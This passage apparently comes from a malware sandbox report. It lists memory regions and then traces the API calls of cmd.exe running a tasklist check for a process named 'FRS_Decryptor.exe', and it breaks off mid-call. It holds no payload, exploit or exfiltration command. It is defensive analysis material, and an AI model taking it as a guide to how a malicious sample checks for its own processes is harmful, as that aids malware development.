region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 8135 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8136 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8137 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8138 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8139 start_va = 0x620000 end_va = 0x69dfff entry_point = 0x620000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8140 start_va = 0x710000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 8141 start_va = 0x900000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 8142 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8143 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8144 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8145 start_va = 0x7f490000 end_va = 0x7f58ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f490000" filename = "" Region: id = 8146 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8147 start_va = 0x910000 end_va = 0xbe4fff entry_point = 0x910000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8166 start_va = 0x490000 end_va = 0x493fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Thread: id = 440 os_tid = 0xa28 [0143.230] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0143.230] __set_app_type (_Type=0x1) [0143.230] __p__fmode () returned 0x76ea1768 [0143.230] __p__commode () returned 0x76ea176c [0143.230] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0143.230] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0143.230] GetCurrentThreadId () returned 0xa28 [0143.230] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa28) returned 0x34 [0143.230] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0143.231] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0143.231] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.232] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x5ef7c4 | out: phkResult=0x5ef7c4*=0x0) returned 0x2 [0143.232] VirtualQuery (in: lpAddress=0x5ef7d3, lpBuffer=0x5ef76c, dwLength=0x1c | out: lpBuffer=0x5ef76c*(BaseAddress=0x5ef000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.232] VirtualQuery (in: lpAddress=0x4f0000, lpBuffer=0x5ef76c, dwLength=0x1c | out: lpBuffer=0x5ef76c*(BaseAddress=0x4f0000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.232] VirtualQuery (in: lpAddress=0x4f1000, lpBuffer=0x5ef76c, dwLength=0x1c | out: lpBuffer=0x5ef76c*(BaseAddress=0x4f1000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.232] VirtualQuery (in: lpAddress=0x4f3000, lpBuffer=0x5ef76c, dwLength=0x1c | out: lpBuffer=0x5ef76c*(BaseAddress=0x4f3000, AllocationBase=0x4f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.232] VirtualQuery (in: lpAddress=0x5f0000, lpBuffer=0x5ef76c, dwLength=0x1c | out: lpBuffer=0x5ef76c*(BaseAddress=0x5f0000, AllocationBase=0x5f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.232] GetConsoleOutputCP () returned 0x1b5 [0143.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0143.233] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0143.233] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0143.233] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0143.233] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0143.233] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0143.233] _get_osfhandle (_FileHandle=0) returned 0x24 [0143.233] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0143.233] GetEnvironmentStringsW () returned 0x7140c0* [0143.233] FreeEnvironmentStringsA (penv="=") returned 1 [0143.233] GetEnvironmentStringsW () returned 0x7140c0* [0143.233] FreeEnvironmentStringsA (penv="=") returned 1 [0143.233] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5ee714 | out: phkResult=0x5ee714*=0x44) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x0, lpData=0x5ee720*=0x0, lpcbData=0x5ee718*=0x1000) returned 0x2 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x1, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x0, lpData=0x5ee720*=0x1, lpcbData=0x5ee718*=0x1000) returned 0x2 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x0, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x40, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x40, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x0, lpData=0x5ee720*=0x40, lpcbData=0x5ee718*=0x1000) returned 0x2 [0143.234] RegCloseKey (hKey=0x44) returned 0x0 [0143.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5ee714 | out: phkResult=0x5ee714*=0x44) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x0, lpData=0x5ee720*=0x40, lpcbData=0x5ee718*=0x1000) returned 0x2 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x1, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x0, lpData=0x5ee720*=0x1, lpcbData=0x5ee718*=0x1000) returned 0x2 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x0, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x9, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x4, lpData=0x5ee720*=0x9, lpcbData=0x5ee718*=0x4) returned 0x0 [0143.234] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5ee71c, lpData=0x5ee720, lpcbData=0x5ee718*=0x1000 | out: lpType=0x5ee71c*=0x0, lpData=0x5ee720*=0x9, lpcbData=0x5ee718*=0x1000) returned 0x2 [0143.234] RegCloseKey (hKey=0x44) returned 0x0 [0143.234] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500ba [0143.234] srand (_Seed=0x5aa500ba) [0143.234] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0143.234] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0143.234] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0143.234] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7140c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0143.234] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.234] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.234] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0143.235] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.235] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.235] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.235] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.235] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.235] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.235] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.235] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.235] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.235] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5ef4f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0143.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x5ef4f4, lpFilePart=0x5ef4f0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5ef4f0*="Desktop") returned 0x1c [0143.235] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0143.235] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5ef270 | out: lpFindFileData=0x5ef270) returned 0x7142d8 [0143.235] FindClose (in: hFindFile=0x7142d8 | out: hFindFile=0x7142d8) returned 1 [0143.235] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x5ef270 | out: lpFindFileData=0x5ef270) returned 0x7142d8 [0143.235] FindClose (in: hFindFile=0x7142d8 | out: hFindFile=0x7142d8) returned 1 [0143.235] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0143.235] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x5ef270 | out: lpFindFileData=0x5ef270) returned 0x7142d8 [0143.235] FindClose (in: hFindFile=0x7142d8 | out: hFindFile=0x7142d8) returned 1 [0143.235] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0143.236] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0143.236] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0143.236] GetEnvironmentStringsW () returned 0x716190* [0143.236] FreeEnvironmentStringsA (penv="=") returned 1 [0143.236] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0143.236] GetConsoleOutputCP () returned 0x1b5 [0143.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0143.236] GetUserDefaultLCID () returned 0x409 [0143.236] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x5ef620, cchData=128 | out: lpLCData="0") returned 2 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x5ef620, cchData=128 | out: lpLCData="0") returned 2 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x5ef620, cchData=128 | out: lpLCData="1") returned 2 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0143.237] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0143.237] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.238] GetConsoleTitleW (in: lpConsoleTitle=0x714e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0143.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0143.238] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0143.238] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0143.238] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0143.239] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0143.239] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0143.239] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0143.239] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0143.239] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0143.239] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0143.239] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0143.240] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0143.240] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0143.240] _wcsicmp (_String1="IF", _String2="find") returned 3 [0143.240] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0143.240] _wcsicmp (_String1="REM", _String2="find") returned 12 [0143.240] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0143.241] _pipe (in: _PtHandles=0x7151f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x7151f0) returned 0 [0143.241] _dup (_FileHandle=1) returned 5 [0143.241] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0143.241] _close (_FileHandle=4) returned 0 [0143.241] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0143.241] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0143.241] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0143.241] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0143.241] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0143.241] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0143.241] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0143.241] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0143.241] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0143.241] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0143.242] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0143.242] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0143.242] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0143.242] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0143.242] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0143.242] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0143.242] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0143.242] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0143.242] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0143.242] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0143.242] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0143.242] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0143.242] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0143.242] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0143.242] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0143.242] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0143.242] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0143.242] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0143.242] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0143.242] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0143.242] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0143.242] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0143.242] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0143.242] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0143.242] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0143.242] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0143.242] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0143.242] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0143.242] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0143.242] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0143.242] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0143.242] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0143.242] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0143.242] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0143.242] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0143.242] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0143.242] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0143.242] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0143.242] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0143.242] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0143.242] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0143.242] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0143.243] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0143.243] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0143.243] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0143.243] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0143.243] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0143.243] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0143.243] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0143.243] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0143.243] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0143.243] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0143.243] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0143.243] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0143.243] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0143.243] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0143.243] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0143.243] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0143.243] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0143.243] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0143.243] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0143.243] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0143.243] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0143.243] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0143.243] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0143.243] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0143.243] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0143.243] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0143.243] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0143.243] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0143.243] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0143.243] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0143.243] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0143.243] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0143.243] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0143.243] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0143.243] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0143.243] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0143.243] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0143.244] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0143.244] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0143.244] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0143.244] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0143.244] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0143.244] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0143.244] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0143.244] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0143.244] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0143.244] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0143.244] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0143.244] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0143.244] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0143.244] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0143.244] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0143.244] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0143.244] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0143.244] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0143.244] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0143.244] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0143.244] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0143.244] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0143.244] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0143.244] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0143.244] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0143.244] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0143.244] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0143.244] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0143.244] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0143.244] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0143.244] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0143.244] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0143.244] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0143.244] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0143.244] _wcsnicmp (_String1="task", 